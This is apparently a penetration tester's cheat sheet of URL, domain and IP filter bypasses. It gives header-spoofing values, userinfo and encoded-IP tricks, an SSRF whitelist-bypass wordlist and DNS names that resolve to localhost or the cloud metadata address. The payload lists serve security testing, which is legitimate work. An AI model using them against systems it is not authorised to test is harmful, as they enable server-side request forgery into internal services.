Bypassing URL/Domain/IP Formats

URL Format Bypass (HackTricks)
URL Obfuscation With Decimal IP Address

IP Spoofing

Bypass domain whitelisting

Bypass protections on 127.0.0.1 or localhost

DNS interaction

nip.io

Use the URL validation bypass cheat sheet (PortSwigger)!

IP Spoofing

Test with these HTTP headers to spoof the IP address. See List of HTTP header fields (Wikipedia).

X-Forwarded-For: client1, proxy1, proxy2
X-Forwarded-For: 111.111.111.111
X-Forwarded-For: 111.111.111.111, 222.222.222.222, 333.333.333.333

X-Forwarded-Host: example.com
X-Forwarded-Host: example.com:8080

Forwarded: for=111.111.111.111;proto=http;by=222.222.222.222
Forwarded: for=111.111.111.111, for=222.222.222.222

Bypass domain whitelisting

Goes to last domain

http://example.com@lisandre.com
https://facebook.com@linkedin.com

nslookup google.com
https://lisandre.com@172.217.13.206

# Decimal bypass: 172.217.13.206 translates to 2899905998 (see IPv4 to decimal)
nslookup google.com 
https://lisandre.com@2899905998

# Octal bypass: 172.217.13.206 translates to 025466206716 (see IP to octal)
nslookup google.com 
https://lisandre.com@025466206716

Bypass protections on 127.0.0.1 or localhost

Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1.
Registering your own domain name that resolves to 127.0.0.1.
Use other domains that resolve to 127.0.0.1, like http://spoofed.burpcollaborator.net or nip.io or tinyurl
Obfuscating blocked strings using URL encoding or case variation.
To bypass filters on directory names, use double URL encoding (“a” is %2561). Or try changing the case like Admin, aDmin, ADMIN, etc. With the Hackvertor extension in Burp Suite:

<@replace('%','%25')><@urlencode_all>admin<@/urlencode_all><@/replace>

Bypass localhost filters

## Localhost
http://example.com@127.0.0.1
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://0
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪

## CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

## Decimal bypass, see IPv4 to decimal
http://2130706433/ = http://127.0.0.1
http://017700000001 = http://127.0.0.1 # IP to octal format, see https://www.browserling.com/tools/ip-to-oct
http://3232235521/ = http://192.168.0.1

## Hexadecimal bypass
127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20

##Domain FUZZ bypass (from https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt)
http://{domain}@127.0.0.1
http://127.0.0.1#{domain}
http://{domain}.127.0.0.1
http://127.0.0.1/{domain}
http://127.0.0.1/?d={domain}
https://{domain}@127.0.0.1
https://127.0.0.1#{domain}
https://{domain}.127.0.0.1
https://127.0.0.1/{domain}
https://127.0.0.1/?d={domain}
http://{domain}@localhost
http://localhost#{domain}
http://{domain}.localhost
http://localhost/{domain}
http://localhost/?d={domain}
http://127.0.0.1%00{domain}
http://127.0.0.1?{domain}
http://127.0.0.1///{domain}
https://127.0.0.1%00{domain}
https://127.0.0.1?{domain}
https://127.0.0.1///{domain}

DNS directing to localhost

localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1

DNS interaction

If you receive a DNS request in Burp Collaborator, try HTTP on the DNS port.

http://<burp collaborator ID>:53/

nip.io

https://nip.io

Wildcard DNS for any IP Address. Stop editing your etc/hosts file with custom hostname and IP address mappings. Will add Origin HTTP Header to HTTP requests.

Example with Amazon S3 bucket

http://s3-eu-west-1.amazonaws.com/<bucket_name>/.nip.io

Examples

nip.io allows you to do that by mapping any IP Address to a hostname using the following formats:

10.0.0.1.nip.io maps to 10.0.0.1
192-168-1-250.nip.io maps to 192.168.1.250
app.10.8.0.1.nip.io maps to 10.8.0.1
app-37-247-48-68.nip.io maps to 37.247.48.68
customer1.app.10.0.0.1.nip.io maps to 10.0.0.1
customer2-app-127-0-0-1.nip.io maps to 127.0.0.1

nip.io maps <anything>[.-]<IP Address>.nip.io in either “dot” or “dash” notation to the corresponding <IP Address>:

dot notation: magic.127.0.0.1.nip.io
dash notation: magic-127-0-0-1.nip.io

The “dash” notation is especially useful when using services like LetsEncrypt as it’s just a regular sub-domain of nip.io.